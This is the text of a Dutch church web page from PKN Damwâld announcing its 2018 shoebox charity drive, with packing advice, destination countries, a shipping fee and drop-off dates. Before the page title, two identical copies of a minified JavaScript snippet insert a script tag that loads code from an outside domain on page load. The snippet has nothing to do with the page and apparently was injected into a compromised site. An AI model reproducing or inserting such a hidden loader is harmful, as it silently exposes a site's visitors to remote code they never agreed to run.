;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Schoenendoosactie 2018 - PKN Damwâld

Schoenendoosactie 2018

Gepubliceerd op: maandag 15 oktober 2018

Ook dit jaar gaat Damwâld weer schoenendozen inleveren met schoolspullen, klein speelgoed en toiletartikelen voor schoenmaatjes ver weg. Schoenmaatjes, die ook een cadeau verdienen net als kinderen in ons rijke Nederland. Voor de kinderen in een ver land gaat een wereld open. Voor het eerst hebben ze vaak hun eigen schoolspullen en speelgoed. En ook u kunt daar voor zorgen.
Dit jaar gaan de schoenendozen naar schoenmaatjes in Moldavië, Albanië, Sri Lanka, Irak of Ghana. Arme kinderen uit Oost Europa, Azië en Afrika krijgen dan jullie schoenen dozen. De schoenendoos niet dichtplakken. Even een elastiek er om doen. Je schoenendoos versturen naar een ver land kost ook geld. Daarom wordt 6 euro verzendkosten gevraagd. Daarvoor maakt uw doos een lange reis.
In de Gereformeerde kerk en de Hervormde kerk van Damwâld worden de folders uitgedeeld op zondag 21 oktober. De inleverdatum wordt dan zondag 4 november. Als kerken en scholen hopen we weer heel veel dozen te mogen versturen naar kinderen, die blij zullen zijn met jullie spullen. Het is altijd de bedoeling, dat gemeenteleden, die geen kinderen op de school hebben ook mee kunnen doen aan deze prachtige actie.
Wij hopen op heel veel gevulde dozen met schoolspullen en klein speelgoed.
Sjoerd en Matty van der Werf ( sjoerdwerfvander@yahoo.com of 424146)